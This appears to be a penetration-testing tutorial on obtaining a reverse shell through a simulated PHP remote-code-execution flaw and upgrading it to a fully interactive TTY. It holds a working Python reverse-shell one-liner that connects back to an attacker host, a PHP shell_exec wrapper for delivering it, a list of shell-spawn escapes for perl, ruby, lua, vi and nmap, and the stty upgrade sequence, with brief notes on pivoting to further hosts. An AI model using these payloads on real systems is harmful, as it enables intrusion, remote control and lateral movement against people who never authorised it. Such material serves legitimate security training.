Early user terminals connected to computers were electromechanical teleprinters or teletypewriters (TeleTYpewriter, TTY), and since then TTY has continued to be used as the name for the text-only console although now this text-only console is a virtual console not a physical console.
Often during penetration testing you may obtain a shell without having tty, yet wish to interact further with the system. For example here we have two different consoles from two different systems.
In this example we will consider “guest” server as the attacker server and “mhnserver” as the target. And we will try a simple reverse shell:
First of all the attacker will start his listening service for a specific known port in order to obtain a shell.
Supposedly, the attacker was able to execute a python script through an RCE (Remote Code Execution) vulnerability on a web server. To simulate this we will open php console and will use the shell_exec function.
Now we will finish our reverse shell using Python.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Attacker IP Address",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'But because we are exploiting the simulated RCE vulnerability in a website written in PHP, we have to adapt:
$output = shell_exec('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Attacker IP Address",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
echo $output;The output on the Target Server is:
The output on the Attacker Server is:
Now that I have access to the Target Server using a reverse shell to the Attacker Server, I want to connect to a third server through SSH. In other words:
Pivoting is the unique technique of using an instance (also referred to as a ‘plant’ or ‘foothold’) to be able to “move” around inside a network. Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems.
Of course we will fail because we do not have a full interactive TTY shell:
And it is funny, let’s try to use Ctrl + C.
As we can see we made two mistakes. We could cause a Denial of Service on our Target Server and we lost our reverse shell.
What should we do now? Restart again, but here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
python -c ‘import pty; pty.spawn(“/bin/sh”)’echo os.system(‘/bin/bash’)/bin/sh -iperl -e 'exec "/bin/sh";'
Or by case:
perl: exec “/bin/sh”;
ruby: exec “/bin/sh”
lua: os.execute(‘/bin/sh’)From within IRB:
exec “/bin/sh”From within vi:
:!bashFrom within vi:
:set shell=/bin/bash:shellFrom within nmap:
!sh
Second try:
No luck! Try harder!
Of course it failed. I wouldn’t have this tutorial if it did not.
Finally if all of the above things fail, you still have one more option. Break your own console to achieve a full interactive TTY shell. Literally.
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Attacker console
$ stty raw -echo
$ fg
# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>Proof of Concept:
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo && fg
Well, the secret is to try hard enough and at some point you will be able to get fully interactive TTY shells.
Thanks to: https://netsec.ws/?p=337 , https://askubuntu.com/questions/481906/what-does-tty-stand-for, https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#tldrcheatsheet and https://www.offensive-security.com/metasploit-unleashed/pivoting/
